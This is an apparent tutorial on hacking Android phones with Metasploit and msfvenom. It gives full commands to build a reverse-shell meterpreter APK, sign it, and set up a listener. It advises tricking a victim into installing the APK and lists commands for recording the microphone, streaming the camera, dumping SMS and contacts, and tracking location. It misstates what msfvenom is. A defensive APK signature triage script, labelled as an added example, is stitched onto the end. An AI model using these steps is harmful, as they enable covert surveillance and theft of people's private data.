How to exploit Android phones with Metasploit and msfvenom

You have probably heard of Metasploit, the most famous hacking framework. It is one of the most widely used pentesting frameworks and is included in Kali Linux by default. All the professional hackers recommend Metasploit as their ideal tool for hacking and exploiting Android phones as well as Windows devices. It also has plenty of modules for hacking iOS. Metasploit and msfvenom are regarded as the best combination for hacking Android devices.
What is msfvenom?
Msfvenom is an Android hacking framework used for making APK files with embedded reverse shells, which can be used for hacking Android devices. This tool was not present in BackTrack but is now present in Kali Linux as a separate option to make Android hacking as easy as possible. We will be using Metasploit and msfvenom together for this hack.
So why is Metasploit so great?
Metasploit, built by Rapid7, is a community-based project. It has numerous exploits and hacks made and optimized by the community. The best part is that it is free. To show how effective it is, let's hack an Android device with Metasploit and msfvenom.
METASPLOIT AND MSFVENOM
When it comes to hacking Android phones, there are lots of ways of doing so. There are apps, web portals, scripts, and whatnot. We have already seen how to hack an Android device with SpyNote.
So today we are going to guide you on how to hack an Android phone using Metasploit and msfvenom.
To perform this hack using Metasploit or msfvenom, you'll need Kali Linux installed on your computer and an Android phone as a target. And obviously, an internet connection is a must.
Below are the steps to perform this hack using Metasploit or msfvenom. So let's start hacking.
Step 1: Creating a malicious apk file
Open Kali Linux, open a terminal and type in the following command:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk

LHOST = your IP address
LPORT = 4444
Use ifconfig to find your IP address if you don't know it:
# ifconfig

Step 2: Delivering APK file to the victim
You have now created your malicious spyware .apk file using Metasploit and msfvenom. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target. Use social engineering to do this so that the victim installs the APK.
If you get any signing errors or issues, use the following:
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname
jarsigner -verify -verbose -certs hackingworld.apk
Step 3: Metasploit setup
Open up a new terminal and use the following command to start Metasploit framework.

# msfconsole
Now in the Metasploit framework console, type the following:
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.78.129
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Here:
LHOST = your IP address
LPORT = 4444

Now when the user opens the app on his/her phone, you will get a session with that device. And whoa! The device is yours to operate. Metasploit and msfvenom are not that difficult to use, but the steps need to be followed methodically.
Step 4: Exploit..!!!
The moment the victim opens the application on their device, you will get a meterpreter shell on the Kali Linux terminal.
You have now successfully hacked the Android device using Metasploit and msfvenom.
Some commands you should try using Metasploit and msfvenom:
– record_mic
Records audio from the Android device and stores it on the local drive.
– webcam_snap
Lets you take images with the camera of the hacked Android device.
– webcam_stream
Lets you stream live video from the hacked Android camera.
– dump_contacts
Lets you copy all the contacts from the victim's phone.
– dump_sms
Lets you copy the victim's messages and store them in a text file on your system.
– geolocate
Helps you track the hacked device by location.
So, this is how hackers hack using Metasploit and msfvenom on the local network.
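
For defenders triaging a sideloaded APK: the jarsigner command in Step 2 (-sigalg SHA1withRSA -digestalg SHA1) leaves a JAR-style (v1) signature with SHA1 digests in META-INF, which can be checked statically without installing the file. The Python below is an added example, not part of the original tutorial; the function names and the sample archive are constructed for illustration, and the v2 check is a heuristic.

```python
import io
import re
import zipfile

V2_MAGIC = b"APK Sig Block 42"  # magic string that ends an APK Signing Block (v2+)
WEAK = {"SHA1", "SHA-1", "MD5"}

def triage_apk(data: bytes) -> dict:
    """Report how an APK (given as raw bytes) is signed and flag weak signing."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        manifest = b""
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF")
    # v1 (JAR) signatures live in META-INF/<ALIAS>.RSA, .DSA or .EC
    v1_files = [n for n in names if re.fullmatch(r"META-INF/[^/]+\.(RSA|DSA|EC)", n, re.I)]
    # Per-file digest attributes look like "SHA1-Digest: ..." or "SHA-256-Digest: ..."
    text = manifest.decode("utf-8", "replace")
    digests = sorted(set(re.findall(r"^([A-Za-z0-9-]+)-Digest:", text, re.M)))
    has_v2 = V2_MAGIC in data  # heuristic: looks for the magic anywhere in the file
    findings = []
    if not v1_files and not has_v2:
        findings.append("unsigned")
    if v1_files and not has_v2:
        findings.append("v1-only (jarsigner-style) signature")
    if digests and all(d.upper() in WEAK for d in digests):
        findings.append("weak manifest digests only: " + ",".join(digests))
    return {"v1_files": v1_files, "v2_block": has_v2,
            "digests": digests, "findings": findings}

def build_sample(digest_name: str, with_v2: bool) -> bytes:
    """Constructed sample: a minimal ZIP laid out like a v1-signed APK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", b"dex\n035\x00")
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\n\r\nName: classes.dex\r\n"
                    f"{digest_name}-Digest: AAAA\r\n\r\n")
        zf.writestr("META-INF/ALIAS_NA.SF", "Signature-Version: 1.0\r\n")
        zf.writestr("META-INF/ALIAS_NA.RSA", b"\x30\x00")
        if with_v2:
            # Marker in the ZIP comment only exercises the check; a real
            # signing block sits just before the central directory.
            zf.comment = V2_MAGIC
    return buf.getvalue()

if __name__ == "__main__":
    for name, v2 in (("SHA1", False), ("SHA-256", True)):
        print(name, v2, triage_apk(build_sample(name, v2))["findings"])
```

A v1-only signature with SHA1 digests is not proof of malice, but combined with an unknown signer and a sideloaded origin it is a reason to hold the file for further analysis.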